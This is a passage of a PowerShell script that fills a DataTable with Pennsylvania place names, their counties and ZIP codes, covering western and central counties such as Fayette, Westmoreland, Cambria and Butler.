$Cities.Rows.Add("Fayette city","Fayette","Pennsylvania","PA","42","15438") + $null = $Cities.Rows.Add("Gibbon glade","Fayette","Pennsylvania","PA","42","15440") + $null = $Cities.Rows.Add("Grindstone","Fayette","Pennsylvania","PA","42","15442") + $null = $Cities.Rows.Add("Hibbs","Fayette","Pennsylvania","PA","42","15443") + $null = $Cities.Rows.Add("Hiller","Fayette","Pennsylvania","PA","42","15444") + $null = $Cities.Rows.Add("Hopwood","Fayette","Pennsylvania","PA","42","15445") + $null = $Cities.Rows.Add("Indian head","Fayette","Pennsylvania","PA","42","15446") + $null = $Cities.Rows.Add("Isabella","Fayette","Pennsylvania","PA","42","15447") + $null = $Cities.Rows.Add("Jacobs creek","Westmoreland","Pennsylvania","PA","42","15448") + $null = $Cities.Rows.Add("La belle","Fayette","Pennsylvania","PA","42","15450") + $null = $Cities.Rows.Add("Lake lynn","Fayette","Pennsylvania","PA","42","15451") + $null = $Cities.Rows.Add("Leckrone","Fayette","Pennsylvania","PA","42","15454") + $null = $Cities.Rows.Add("Leisenring","Fayette","Pennsylvania","PA","42","15455") + $null = $Cities.Rows.Add("Lemont furnace","Fayette","Pennsylvania","PA","42","15456") + $null = $Cities.Rows.Add("Lamberton","Fayette","Pennsylvania","PA","42","15458") + $null = $Cities.Rows.Add("Markleysburg","Fayette","Pennsylvania","PA","42","15459") + $null = $Cities.Rows.Add("Martin","Fayette","Pennsylvania","PA","42","15460") + $null = $Cities.Rows.Add("Grays landing","Fayette","Pennsylvania","PA","42","15461") + $null = $Cities.Rows.Add("Melcroft","Fayette","Pennsylvania","PA","42","15462") + $null = $Cities.Rows.Add("Mill run","Fayette","Pennsylvania","PA","42","15464") + $null = $Cities.Rows.Add("Newell","Fayette","Pennsylvania","PA","42","15466") + $null = $Cities.Rows.Add("New salem","Fayette","Pennsylvania","PA","42","15468") + $null = $Cities.Rows.Add("Normalville","Fayette","Pennsylvania","PA","42","15469") + $null = $Cities.Rows.Add("Ohiopyle","Fayette","Pennsylvania","PA","42","15470") + $null = $Cities.Rows.Add("Oliver","Fayette","Pennsylvania","PA","42","15472") + $null = $Cities.Rows.Add("Layton","Fayette","Pennsylvania","PA","42","15473") + $null = $Cities.Rows.Add("Point marion","Fayette","Pennsylvania","PA","42","15474") + $null = $Cities.Rows.Add("Republic","Fayette","Pennsylvania","PA","42","15475") + $null = $Cities.Rows.Add("Ronco","Fayette","Pennsylvania","PA","42","15476") + $null = $Cities.Rows.Add("Roscoe","Washington","Pennsylvania","PA","42","15477") + $null = $Cities.Rows.Add("Smithfield","Fayette","Pennsylvania","PA","42","15478") + $null = $Cities.Rows.Add("Van meter","Westmoreland","Pennsylvania","PA","42","15479") + $null = $Cities.Rows.Add("Smock","Fayette","Pennsylvania","PA","42","15480") + $null = $Cities.Rows.Add("Star junction","Fayette","Pennsylvania","PA","42","15482") + $null = $Cities.Rows.Add("Stockdale","Washington","Pennsylvania","PA","42","15483") + $null = $Cities.Rows.Add("Uledi","Fayette","Pennsylvania","PA","42","15484") + $null = $Cities.Rows.Add("Ursina","Somerset","Pennsylvania","PA","42","15485") + $null = $Cities.Rows.Add("Vanderbilt","Fayette","Pennsylvania","PA","42","15486") + $null = $Cities.Rows.Add("West leisenring","Fayette","Pennsylvania","PA","42","15489") + $null = $Cities.Rows.Add("White","Fayette","Pennsylvania","PA","42","15490") + $null = $Cities.Rows.Add("Wickhaven","Fayette","Pennsylvania","PA","42","15492") + $null = $Cities.Rows.Add("Zcta 154hh","Fayette","Pennsylvania","PA","42","154HH") + $null = $Cities.Rows.Add("Somerset","Somerset","Pennsylvania","PA","42","15501") + $null = $Cities.Rows.Add("Acosta","Somerset","Pennsylvania","PA","42","15520") + $null = $Cities.Rows.Add("Alum bank","Bedford","Pennsylvania","PA","42","15521") + $null = $Cities.Rows.Add("Bedford","Bedford","Pennsylvania","PA","42","15522") + $null = $Cities.Rows.Add("Berlin","Somerset","Pennsylvania","PA","42","15530") + $null = $Cities.Rows.Add("Boswell","Somerset","Pennsylvania","PA","42","15531") + $null = $Cities.Rows.Add("Boynton","Somerset","Pennsylvania","PA","42","15532") + $null = $Cities.Rows.Add("Breezewood","Bedford","Pennsylvania","PA","42","15533") + $null = $Cities.Rows.Add("Buffalo mills","Bedford","Pennsylvania","PA","42","15534") + $null = $Cities.Rows.Add("Clearville","Bedford","Pennsylvania","PA","42","15535") + $null = $Cities.Rows.Add("Crystal spring","Fulton","Pennsylvania","PA","42","15536") + $null = $Cities.Rows.Add("Everett","Bedford","Pennsylvania","PA","42","15537") + $null = $Cities.Rows.Add("Glencoe","Somerset","Pennsylvania","PA","42","15538") + $null = $Cities.Rows.Add("Fishertown","Bedford","Pennsylvania","PA","42","15539") + $null = $Cities.Rows.Add("Fort hill","Somerset","Pennsylvania","PA","42","15540") + $null = $Cities.Rows.Add("Friedens","Somerset","Pennsylvania","PA","42","15541") + $null = $Cities.Rows.Add("Garrett","Somerset","Pennsylvania","PA","42","15542") + $null = $Cities.Rows.Add("Gray","Somerset","Pennsylvania","PA","42","15544") + $null = $Cities.Rows.Add("Hyndman","Bedford","Pennsylvania","PA","42","15545") + $null = $Cities.Rows.Add("Jenners","Somerset","Pennsylvania","PA","42","15546") + $null = $Cities.Rows.Add("Jennerstown","Somerset","Pennsylvania","PA","42","15547") + $null = $Cities.Rows.Add("Manns choice","Bedford","Pennsylvania","PA","42","15550") + $null = $Cities.Rows.Add("Markleton","Somerset","Pennsylvania","PA","42","15551") + $null = $Cities.Rows.Add("Meyersdale","Somerset","Pennsylvania","PA","42","15552") + $null = $Cities.Rows.Add("New baltimore","Somerset","Pennsylvania","PA","42","15553") + $null = $Cities.Rows.Add("New paris","Bedford","Pennsylvania","PA","42","15554") + $null = $Cities.Rows.Add("Rockwood","Somerset","Pennsylvania","PA","42","15557") + $null = $Cities.Rows.Add("Salisbury","Somerset","Pennsylvania","PA","42","15558") + $null = $Cities.Rows.Add("Schellsburg","Bedford","Pennsylvania","PA","42","15559") + $null = $Cities.Rows.Add("Shanksville","Somerset","Pennsylvania","PA","42","15560") + $null = $Cities.Rows.Add("Springs","Somerset","Pennsylvania","PA","42","15562") + $null = $Cities.Rows.Add("Stoystown","Somerset","Pennsylvania","PA","42","15563") + $null = $Cities.Rows.Add("Zcta 155hh","Bedford","Pennsylvania","PA","42","155HH") + $null = $Cities.Rows.Add("Greensburg","Westmoreland","Pennsylvania","PA","42","15601") + $null = $Cities.Rows.Add("Acme","Westmoreland","Pennsylvania","PA","42","15610") + $null = $Cities.Rows.Add("Adamsburg","Westmoreland","Pennsylvania","PA","42","15611") + $null = $Cities.Rows.Add("Alverton","Westmoreland","Pennsylvania","PA","42","15612") + $null = $Cities.Rows.Add("Apollo","Westmoreland","Pennsylvania","PA","42","15613") + $null = $Cities.Rows.Add("Ardara","Westmoreland","Pennsylvania","PA","42","15615") + $null = $Cities.Rows.Add("Arona","Westmoreland","Pennsylvania","PA","42","15617") + $null = $Cities.Rows.Add("Avonmore","Westmoreland","Pennsylvania","PA","42","15618") + $null = $Cities.Rows.Add("Bradenville","Westmoreland","Pennsylvania","PA","42","15620") + $null = $Cities.Rows.Add("Champion","Fayette","Pennsylvania","PA","42","15622") + $null = $Cities.Rows.Add("Claridge","Westmoreland","Pennsylvania","PA","42","15623") + $null = $Cities.Rows.Add("Crabtree","Westmoreland","Pennsylvania","PA","42","15624") + $null = $Cities.Rows.Add("Darragh","Westmoreland","Pennsylvania","PA","42","15625") + $null = $Cities.Rows.Add("Delmont","Westmoreland","Pennsylvania","PA","42","15626") + $null = $Cities.Rows.Add("Derry","Westmoreland","Pennsylvania","PA","42","15627") + $null = $Cities.Rows.Add("Donegal","Westmoreland","Pennsylvania","PA","42","15628") + $null = $Cities.Rows.Add("East vandergrift","Westmoreland","Pennsylvania","PA","42","15629") + $null = $Cities.Rows.Add("Everson","Fayette","Pennsylvania","PA","42","15631") + $null = $Cities.Rows.Add("Export","Westmoreland","Pennsylvania","PA","42","15632") + $null = $Cities.Rows.Add("Forbes road","Westmoreland","Pennsylvania","PA","42","15633") + $null = $Cities.Rows.Add("Grapeville","Westmoreland","Pennsylvania","PA","42","15634") + $null = $Cities.Rows.Add("Hannastown","Westmoreland","Pennsylvania","PA","42","15635") + $null = $Cities.Rows.Add("Harrison city","Westmoreland","Pennsylvania","PA","42","15636") + $null = $Cities.Rows.Add("Herminie","Westmoreland","Pennsylvania","PA","42","15637") + $null = $Cities.Rows.Add("Hunker","Westmoreland","Pennsylvania","PA","42","15639") + $null = $Cities.Rows.Add("Hutchinson","Westmoreland","Pennsylvania","PA","42","15640") + $null = $Cities.Rows.Add("Hyde park","Westmoreland","Pennsylvania","PA","42","15641") + $null = $Cities.Rows.Add("North huntingdon","Westmoreland","Pennsylvania","PA","42","15642") + $null = $Cities.Rows.Add("Jeannette","Westmoreland","Pennsylvania","PA","42","15644") + $null = $Cities.Rows.Add("Jones mills","Westmoreland","Pennsylvania","PA","42","15646") + $null = $Cities.Rows.Add("Larimer","Westmoreland","Pennsylvania","PA","42","15647") + $null = $Cities.Rows.Add("Latrobe","Westmoreland","Pennsylvania","PA","42","15650") + $null = $Cities.Rows.Add("Laughlintown","Westmoreland","Pennsylvania","PA","42","15655") + $null = $Cities.Rows.Add("Leechburg","Westmoreland","Pennsylvania","PA","42","15656") + $null = $Cities.Rows.Add("Wilpen","Westmoreland","Pennsylvania","PA","42","15658") + $null = $Cities.Rows.Add("Lowber","Westmoreland","Pennsylvania","PA","42","15660") + $null = $Cities.Rows.Add("Loyalhanna","Westmoreland","Pennsylvania","PA","42","15661") + $null = $Cities.Rows.Add("Luxor","Westmoreland","Pennsylvania","PA","42","15662") + $null = $Cities.Rows.Add("Madison","Westmoreland","Pennsylvania","PA","42","15663") + $null = $Cities.Rows.Add("Manor","Westmoreland","Pennsylvania","PA","42","15665") + $null = $Cities.Rows.Add("Mount pleasant","Westmoreland","Pennsylvania","PA","42","15666") + $null = $Cities.Rows.Add("Murrysville","Westmoreland","Pennsylvania","PA","42","15668") + $null = $Cities.Rows.Add("New alexandria","Westmoreland","Pennsylvania","PA","42","15670") + $null = $Cities.Rows.Add("New derry","Westmoreland","Pennsylvania","PA","42","15671") + $null = $Cities.Rows.Add("New stanton","Westmoreland","Pennsylvania","PA","42","15672") + $null = $Cities.Rows.Add("North apollo","Armstrong","Pennsylvania","PA","42","15673") + $null = $Cities.Rows.Add("Norvelt","Westmoreland","Pennsylvania","PA","42","15674") + $null = $Cities.Rows.Add("Penn","Westmoreland","Pennsylvania","PA","42","15675") + $null = $Cities.Rows.Add("Pleasant unity","Westmoreland","Pennsylvania","PA","42","15676") + $null = $Cities.Rows.Add("Rector","Westmoreland","Pennsylvania","PA","42","15677") + $null = $Cities.Rows.Add("Rillton","Westmoreland","Pennsylvania","PA","42","15678") + $null = $Cities.Rows.Add("Ruffs dale","Westmoreland","Pennsylvania","PA","42","15679") + $null = $Cities.Rows.Add("Salina","Westmoreland","Pennsylvania","PA","42","15680") + $null = $Cities.Rows.Add("Saltsburg","Indiana","Pennsylvania","PA","42","15681") + $null = $Cities.Rows.Add("Scottdale","Westmoreland","Pennsylvania","PA","42","15683") + $null = $Cities.Rows.Add("Slickville","Westmoreland","Pennsylvania","PA","42","15684") + $null = $Cities.Rows.Add("Southwest","Westmoreland","Pennsylvania","PA","42","15685") + $null = $Cities.Rows.Add("Spring church","Armstrong","Pennsylvania","PA","42","15686") + $null = $Cities.Rows.Add("Stahlstown","Westmoreland","Pennsylvania","PA","42","15687") + $null = $Cities.Rows.Add("Tarrs","Westmoreland","Pennsylvania","PA","42","15688") + $null = $Cities.Rows.Add("United","Westmoreland","Pennsylvania","PA","42","15689") + $null = $Cities.Rows.Add("Park","Westmoreland","Pennsylvania","PA","42","15690") + $null = $Cities.Rows.Add("Westmoreland cit","Westmoreland","Pennsylvania","PA","42","15692") + $null = $Cities.Rows.Add("Whitney","Westmoreland","Pennsylvania","PA","42","15693") + $null = $Cities.Rows.Add("Wyano","Westmoreland","Pennsylvania","PA","42","15695") + $null = $Cities.Rows.Add("Youngstown","Westmoreland","Pennsylvania","PA","42","15696") + $null = $Cities.Rows.Add("Youngwood","Westmoreland","Pennsylvania","PA","42","15697") + $null = $Cities.Rows.Add("Yukon","Westmoreland","Pennsylvania","PA","42","15698") + $null = $Cities.Rows.Add("Zcta 156hh","Armstrong","Pennsylvania","PA","42","156HH") + $null = $Cities.Rows.Add("Indiana","Indiana","Pennsylvania","PA","42","15701") + $null = $Cities.Rows.Add("Alverda","Indiana","Pennsylvania","PA","42","15710") + $null = $Cities.Rows.Add("Anita","Jefferson","Pennsylvania","PA","42","15711") + $null = $Cities.Rows.Add("Arcadia","Indiana","Pennsylvania","PA","42","15712") + $null = $Cities.Rows.Add("Aultman","Indiana","Pennsylvania","PA","42","15713") + $null = $Cities.Rows.Add("Barnesboro","Cambria","Pennsylvania","PA","42","15714") + $null = $Cities.Rows.Add("Big run","Jefferson","Pennsylvania","PA","42","15715") + $null = $Cities.Rows.Add("Black lick","Indiana","Pennsylvania","PA","42","15716") + $null = $Cities.Rows.Add("Blairsville","Indiana","Pennsylvania","PA","42","15717") + $null = $Cities.Rows.Add("Burnside","Clearfield","Pennsylvania","PA","42","15721") + $null = $Cities.Rows.Add("Carrolltown","Cambria","Pennsylvania","PA","42","15722") + $null = $Cities.Rows.Add("Chambersville","Indiana","Pennsylvania","PA","42","15723") + $null = $Cities.Rows.Add("Cherry tree","Indiana","Pennsylvania","PA","42","15724") + $null = $Cities.Rows.Add("Clarksburg","Indiana","Pennsylvania","PA","42","15725") + $null = $Cities.Rows.Add("Clymer","Indiana","Pennsylvania","PA","42","15728") + $null = $Cities.Rows.Add("Commodore","Indiana","Pennsylvania","PA","42","15729") + $null = $Cities.Rows.Add("Coolspring","Jefferson","Pennsylvania","PA","42","15730") + $null = $Cities.Rows.Add("Coral","Indiana","Pennsylvania","PA","42","15731") + $null = $Cities.Rows.Add("Creekside","Indiana","Pennsylvania","PA","42","15732") + $null = $Cities.Rows.Add("De lancey","Jefferson","Pennsylvania","PA","42","15733") + $null = $Cities.Rows.Add("Dixonville","Indiana","Pennsylvania","PA","42","15734") + $null = $Cities.Rows.Add("Elderton","Armstrong","Pennsylvania","PA","42","15736") + $null = $Cities.Rows.Add("Ernest","Indiana","Pennsylvania","PA","42","15739") + $null = $Cities.Rows.Add("Gipsy","Indiana","Pennsylvania","PA","42","15741") + $null = $Cities.Rows.Add("Glen campbell","Indiana","Pennsylvania","PA","42","15742") + $null = $Cities.Rows.Add("Hamilton","Jefferson","Pennsylvania","PA","42","15744") + $null = $Cities.Rows.Add("Heilwood","Indiana","Pennsylvania","PA","42","15745") + $null = $Cities.Rows.Add("Home","Indiana","Pennsylvania","PA","42","15747") + $null = $Cities.Rows.Add("Graceton","Indiana","Pennsylvania","PA","42","15748") + $null = $Cities.Rows.Add("Kent","Indiana","Pennsylvania","PA","42","15752") + $null = $Cities.Rows.Add("La jose","Clearfield","Pennsylvania","PA","42","15753") + $null = $Cities.Rows.Add("Lucernemines","Indiana","Pennsylvania","PA","42","15754") + $null = $Cities.Rows.Add("Mc intyre","Indiana","Pennsylvania","PA","42","15756") + $null = $Cities.Rows.Add("Mc gees mills","Clearfield","Pennsylvania","PA","42","15757") + $null = $Cities.Rows.Add("Marion center","Indiana","Pennsylvania","PA","42","15759") + $null = $Cities.Rows.Add("Marsteller","Cambria","Pennsylvania","PA","42","15760") + $null = $Cities.Rows.Add("Mentcle","Indiana","Pennsylvania","PA","42","15761") + $null = $Cities.Rows.Add("Nicktown","Cambria","Pennsylvania","PA","42","15762") + $null = $Cities.Rows.Add("Northpoint","Indiana","Pennsylvania","PA","42","15763") + $null = $Cities.Rows.Add("Oliveburg","Jefferson","Pennsylvania","PA","42","15764") + $null = $Cities.Rows.Add("Penn run","Indiana","Pennsylvania","PA","42","15765") + $null = $Cities.Rows.Add("Punxsutawney","Jefferson","Pennsylvania","PA","42","15767") + $null = $Cities.Rows.Add("Ringgold","Jefferson","Pennsylvania","PA","42","15770") + $null = $Cities.Rows.Add("Rochester mills","Indiana","Pennsylvania","PA","42","15771") + $null = $Cities.Rows.Add("Rossiter","Indiana","Pennsylvania","PA","42","15772") + $null = $Cities.Rows.Add("Saint benedict","Cambria","Pennsylvania","PA","42","15773") + $null = $Cities.Rows.Add("Shelocta","Armstrong","Pennsylvania","PA","42","15774") + $null = $Cities.Rows.Add("Spangler","Cambria","Pennsylvania","PA","42","15775") + $null = $Cities.Rows.Add("Sprankle mills","Jefferson","Pennsylvania","PA","42","15776") + $null = $Cities.Rows.Add("Starford","Indiana","Pennsylvania","PA","42","15777") + $null = $Cities.Rows.Add("Timblin","Jefferson","Pennsylvania","PA","42","15778") + $null = $Cities.Rows.Add("Torrance","Westmoreland","Pennsylvania","PA","42","15779") + $null = $Cities.Rows.Add("Valier","Jefferson","Pennsylvania","PA","42","15780") + $null = $Cities.Rows.Add("Walston","Jefferson","Pennsylvania","PA","42","15781") + $null = $Cities.Rows.Add("West lebanon","Indiana","Pennsylvania","PA","42","15783") + $null = $Cities.Rows.Add("Worthville","Jefferson","Pennsylvania","PA","42","15784") + $null = $Cities.Rows.Add("Zcta 157hh","Armstrong","Pennsylvania","PA","42","157HH") + $null = $Cities.Rows.Add("Du bois","Clearfield","Pennsylvania","PA","42","15801") + $null = $Cities.Rows.Add("Benezett","Elk","Pennsylvania","PA","42","15821") + $null = $Cities.Rows.Add("Brockport","Elk","Pennsylvania","PA","42","15823") + $null = $Cities.Rows.Add("Brockway","Jefferson","Pennsylvania","PA","42","15824") + $null = $Cities.Rows.Add("Hazen","Jefferson","Pennsylvania","PA","42","15825") + $null = $Cities.Rows.Add("Byrnedale","Elk","Pennsylvania","PA","42","15827") + $null = $Cities.Rows.Add("Clarington","Jefferson","Pennsylvania","PA","42","15828") + $null = $Cities.Rows.Add("Corsica","Jefferson","Pennsylvania","PA","42","15829") + $null = $Cities.Rows.Add("Driftwood","Cameron","Pennsylvania","PA","42","15832") + $null = $Cities.Rows.Add("Emporium","Cameron","Pennsylvania","PA","42","15834") + $null = $Cities.Rows.Add("Falls creek","Jefferson","Pennsylvania","PA","42","15840") + $null = $Cities.Rows.Add("Force","Elk","Pennsylvania","PA","42","15841") + $null = $Cities.Rows.Add("Johnsonburg","Elk","Pennsylvania","PA","42","15845") + $null = $Cities.Rows.Add("Kersey","Elk","Pennsylvania","PA","42","15846") + $null = $Cities.Rows.Add("Knox dale","Jefferson","Pennsylvania","PA","42","15847") + $null = $Cities.Rows.Add("Luthersburg","Clearfield","Pennsylvania","PA","42","15848") + $null = $Cities.Rows.Add("Penfield","Clearfield","Pennsylvania","PA","42","15849") + $null = $Cities.Rows.Add("Reynoldsville","Jefferson","Pennsylvania","PA","42","15851") + $null = $Cities.Rows.Add("Portland mills","Elk","Pennsylvania","PA","42","15853") + $null = $Cities.Rows.Add("Rockton","Clearfield","Pennsylvania","PA","42","15856") + $null = $Cities.Rows.Add("Saint marys","Elk","Pennsylvania","PA","42","15857") + $null = $Cities.Rows.Add("Sigel","Jefferson","Pennsylvania","PA","42","15860") + $null = $Cities.Rows.Add("Sinnamahoning","Cameron","Pennsylvania","PA","42","15861") + $null = $Cities.Rows.Add("Stump creek","Jefferson","Pennsylvania","PA","42","15863") + $null = $Cities.Rows.Add("Summerville","Jefferson","Pennsylvania","PA","42","15864") + $null = $Cities.Rows.Add("Sykesville","Jefferson","Pennsylvania","PA","42","15865") + $null = $Cities.Rows.Add("Troutville","Clearfield","Pennsylvania","PA","42","15866") + $null = $Cities.Rows.Add("Weedville","Elk","Pennsylvania","PA","42","15868") + $null = $Cities.Rows.Add("Wilcox","Elk","Pennsylvania","PA","42","15870") + $null = $Cities.Rows.Add("Zcta 158hh","Cameron","Pennsylvania","PA","42","158HH") + $null = $Cities.Rows.Add("Zcta 158xx","Clearfield","Pennsylvania","PA","42","158XX") + $null = $Cities.Rows.Add("Johnstown","Cambria","Pennsylvania","PA","42","15901") + $null = $Cities.Rows.Add("Johnstown","Cambria","Pennsylvania","PA","42","15902") + $null = $Cities.Rows.Add("Johnstown","Cambria","Pennsylvania","PA","42","15904") + $null = $Cities.Rows.Add("Johnstown","Cambria","Pennsylvania","PA","42","15905") + $null = $Cities.Rows.Add("Johnstown","Cambria","Pennsylvania","PA","42","15906") + $null = $Cities.Rows.Add("Johnstown","Cambria","Pennsylvania","PA","42","15909") + $null = $Cities.Rows.Add("Armagh","Indiana","Pennsylvania","PA","42","15920") + $null = $Cities.Rows.Add("Bolivar","Westmoreland","Pennsylvania","PA","42","15923") + $null = $Cities.Rows.Add("Cairnbrook","Somerset","Pennsylvania","PA","42","15924") + $null = $Cities.Rows.Add("Cassandra","Cambria","Pennsylvania","PA","42","15925") + $null = $Cities.Rows.Add("Central city","Somerset","Pennsylvania","PA","42","15926") + $null = $Cities.Rows.Add("Colver","Cambria","Pennsylvania","PA","42","15927") + $null = $Cities.Rows.Add("Davidsville","Somerset","Pennsylvania","PA","42","15928") + $null = $Cities.Rows.Add("Dilltown","Indiana","Pennsylvania","PA","42","15929") + $null = $Cities.Rows.Add("Dunlo","Cambria","Pennsylvania","PA","42","15930") + $null = $Cities.Rows.Add("Ebensburg","Cambria","Pennsylvania","PA","42","15931") + $null = $Cities.Rows.Add("Elton","Cambria","Pennsylvania","PA","42","15934") + $null = $Cities.Rows.Add("Hollsopple","Somerset","Pennsylvania","PA","42","15935") + $null = $Cities.Rows.Add("Hooversville","Somerset","Pennsylvania","PA","42","15936") + $null = $Cities.Rows.Add("Jerome","Somerset","Pennsylvania","PA","42","15937") + $null = $Cities.Rows.Add("Lilly","Cambria","Pennsylvania","PA","42","15938") + $null = $Cities.Rows.Add("Loretto","Cambria","Pennsylvania","PA","42","15940") + $null = $Cities.Rows.Add("Mineral point","Cambria","Pennsylvania","PA","42","15942") + $null = $Cities.Rows.Add("Nanty glo","Cambria","Pennsylvania","PA","42","15943") + $null = $Cities.Rows.Add("New florence","Westmoreland","Pennsylvania","PA","42","15944") + $null = $Cities.Rows.Add("Puritan","Cambria","Pennsylvania","PA","42","15946") + $null = $Cities.Rows.Add("Revloc","Cambria","Pennsylvania","PA","42","15948") + $null = $Cities.Rows.Add("Robinson","Indiana","Pennsylvania","PA","42","15949") + $null = $Cities.Rows.Add("Salix","Cambria","Pennsylvania","PA","42","15952") + $null = $Cities.Rows.Add("Seward","Indiana","Pennsylvania","PA","42","15954") + $null = $Cities.Rows.Add("Sidman","Cambria","Pennsylvania","PA","42","15955") + $null = $Cities.Rows.Add("South fork","Cambria","Pennsylvania","PA","42","15956") + $null = $Cities.Rows.Add("Strongstown","Indiana","Pennsylvania","PA","42","15957") + $null = $Cities.Rows.Add("Summerhill","Cambria","Pennsylvania","PA","42","15958") + $null = $Cities.Rows.Add("Vintondale","Indiana","Pennsylvania","PA","42","15961") + $null = $Cities.Rows.Add("Windber","Somerset","Pennsylvania","PA","42","15963") + $null = $Cities.Rows.Add("Zcta 159hh","Cambria","Pennsylvania","PA","42","159HH") + $null = $Cities.Rows.Add("Bon aire","Butler","Pennsylvania","PA","42","16001") + $null = $Cities.Rows.Add("Zcta 16002","Butler","Pennsylvania","PA","42","16002") + $null = $Cities.Rows.Add("Boyers","Butler","Pennsylvania","PA","42","16020") + $null = $Cities.Rows.Add("Bruin","Butler","Pennsylvania","PA","42","16022") + $null = $Cities.Rows.Add("Marwood","Butler","Pennsylvania","PA","42","16023") + $null = $Cities.Rows.Add("Callery","Butler","Pennsylvania","PA","42","16024") + $null = $Cities.Rows.Add("Chicora","Butler","Pennsylvania","PA","42","16025") + $null = $Cities.Rows.Add("Connoquenessing","Butler","Pennsylvania","PA","42","16027") + $null = $Cities.Rows.Add("East brady","Armstrong","Pennsylvania","PA","42","16028") + $null = $Cities.Rows.Add("East butler","Butler","Pennsylvania","PA","42","16029") + $null = $Cities.Rows.Add("Eau claire","Butler","Pennsylvania","PA","42","16030") + $null = $Cities.Rows.Add("Evans city","Butler","Pennsylvania","PA","42","16033") + $null = $Cities.Rows.Add("Fenelton","Butler","Pennsylvania","PA","42","16034") + $null = $Cities.Rows.Add("Forestville","Butler","Pennsylvania","PA","42","16035") + $null = $Cities.Rows.Add("Foxburg","Clarion","Pennsylvania","PA","42","16036") + $null = $Cities.Rows.Add("Harmony","Butler","Pennsylvania","PA","42","16037") + $null = $Cities.Rows.Add("Harrisville","Butler","Pennsylvania","PA","42","16038") + $null = $Cities.Rows.Add("Hilliards","Butler","Pennsylvania","PA","42","16040") + $null = $Cities.Rows.Add("Karns city","Butler","Pennsylvania","PA","42","16041") + $null = $Cities.Rows.Add("Lyndora","Butler","Pennsylvania","PA","42","16045") + $null = $Cities.Rows.Add("Mars","Butler","Pennsylvania","PA","42","16046") + $null = $Cities.Rows.Add("Parker","Clarion","Pennsylvania","PA","42","16049") + $null = $Cities.Rows.Add("Petrolia","Butler","Pennsylvania","PA","42","16050") + $null = $Cities.Rows.Add("Portersville","Butler","Pennsylvania","PA","42","16051") + $null = $Cities.Rows.Add("Prospect","Butler","Pennsylvania","PA","42","16052") + $null = $Cities.Rows.Add("Renfrew","Butler","Pennsylvania","PA","42","16053") + $null = $Cities.Rows.Add("Saint petersburg","Clarion","Pennsylvania","PA","42","16054") + $null = $Cities.Rows.Add("Sarver","Butler","Pennsylvania","PA","42","16055") + $null = $Cities.Rows.Add("Saxonburg","Butler","Pennsylvania","PA","42","16056") + $null = $Cities.Rows.Add("Slippery rock","Butler","Pennsylvania","PA","42","16057") + $null = $Cities.Rows.Add("Valencia","Butler","Pennsylvania","PA","42","16059") + $null = $Cities.Rows.Add("West sunbury","Butler","Pennsylvania","PA","42","16061") + $null = $Cities.Rows.Add("Zelienople","Butler","Pennsylvania","PA","42","16063") + $null = $Cities.Rows.Add("Mars","Butler","Pennsylvania","PA","42","16066") + $null = $Cities.Rows.Add("Zcta 160hh","Butler","Pennsylvania","PA","42","160HH") + $null = $Cities.Rows.Add("New castle","Lawrence","Pennsylvania","PA","42","16101") + $null = $Cities.Rows.Add("New castle","Lawrence","Pennsylvania","PA","42","16102") + $null = $Cities.Rows.Add("Neshannock","Lawrence","Pennsylvania","PA","42","16105") + $null = $Cities.Rows.Add("Adamsville","Crawford","Pennsylvania","PA","42","16110") + $null = $Cities.Rows.Add("Atlantic","Crawford","Pennsylvania","PA","42","16111") + $null = $Cities.Rows.Add("Bessemer","Lawrence","Pennsylvania","PA","42","16112") + $null = $Cities.Rows.Add("Clark","Mercer","Pennsylvania","PA","42","16113") + $null = $Cities.Rows.Add("Clarks mills","Mercer","Pennsylvania","PA","42","16114") + $null = $Cities.Rows.Add("Darlington","Beaver","Pennsylvania","PA","42","16115") + $null = $Cities.Rows.Add("Edinburg","Lawrence","Pennsylvania","PA","42","16116") + $null = $Cities.Rows.Add("Ellport","Lawrence","Pennsylvania","PA","42","16117") + $null = $Cities.Rows.Add("Enon valley","Lawrence","Pennsylvania","PA","42","16120") + $null = $Cities.Rows.Add("Farrell","Mercer","Pennsylvania","PA","42","16121") + $null = $Cities.Rows.Add("Fombell","Beaver","Pennsylvania","PA","42","16123") + $null = $Cities.Rows.Add("Fredonia","Mercer","Pennsylvania","PA","42","16124") + $null = $Cities.Rows.Add("Shenango","Mercer","Pennsylvania","PA","42","16125") + $null = $Cities.Rows.Add("Grove city","Mercer","Pennsylvania","PA","42","16127") + $null = $Cities.Rows.Add("Hadley","Mercer","Pennsylvania","PA","42","16130") + $null = $Cities.Rows.Add("Hartstown","Crawford","Pennsylvania","PA","42","16131") + $null = $Cities.Rows.Add("Hillsville","Lawrence","Pennsylvania","PA","42","16132") + $null = $Cities.Rows.Add("Jackson center","Mercer","Pennsylvania","PA","42","16133") + $null = $Cities.Rows.Add("Westford","Crawford","Pennsylvania","PA","42","16134") + $null = $Cities.Rows.Add("Koppel","Beaver","Pennsylvania","PA","42","16136") + $null = $Cities.Rows.Add("Mercer","Mercer","Pennsylvania","PA","42","16137") + $null = $Cities.Rows.Add("New bedford","Lawrence","Pennsylvania","PA","42","16140") + $null = $Cities.Rows.Add("New galilee","Beaver","Pennsylvania","PA","42","16141") + $null = $Cities.Rows.Add("New wilmington","Lawrence","Pennsylvania","PA","42","16142") + $null = $Cities.Rows.Add("Pulaski","Lawrence","Pennsylvania","PA","42","16143") + $null = $Cities.Rows.Add("Sandy lake","Mercer","Pennsylvania","PA","42","16145") + $null = $Cities.Rows.Add("Sharon","Mercer","Pennsylvania","PA","42","16146") + $null = $Cities.Rows.Add("Hermitage","Mercer","Pennsylvania","PA","42","16148") + $null = $Cities.Rows.Add("Sharpsville","Mercer","Pennsylvania","PA","42","16150") + $null = $Cities.Rows.Add("Sheakleyville","Mercer","Pennsylvania","PA","42","16151") + $null = $Cities.Rows.Add("Stoneboro","Mercer","Pennsylvania","PA","42","16153") + $null = $Cities.Rows.Add("Transfer","Mercer","Pennsylvania","PA","42","16154") + $null = $Cities.Rows.Add("Villa maria","Lawrence","Pennsylvania","PA","42","16155") + $null = $Cities.Rows.Add("Volant","Lawrence","Pennsylvania","PA","42","16156") + $null = $Cities.Rows.Add("Wampum","Lawrence","Pennsylvania","PA","42","16157") + $null = $Cities.Rows.Add("West middlesex","Mercer","Pennsylvania","PA","42","16159") + $null = $Cities.Rows.Add("West pittsburg","Lawrence","Pennsylvania","PA","42","16160") + $null = $Cities.Rows.Add("Wheatland","Mercer","Pennsylvania","PA","42","16161") + $null = $Cities.Rows.Add("Zcta 161hh","Beaver","Pennsylvania","PA","42","161HH") + $null = $Cities.Rows.Add("Kittanning","Armstrong","Pennsylvania","PA","42","16201") + $null = $Cities.Rows.Add("Adrian","Armstrong","Pennsylvania","PA","42","16210") + 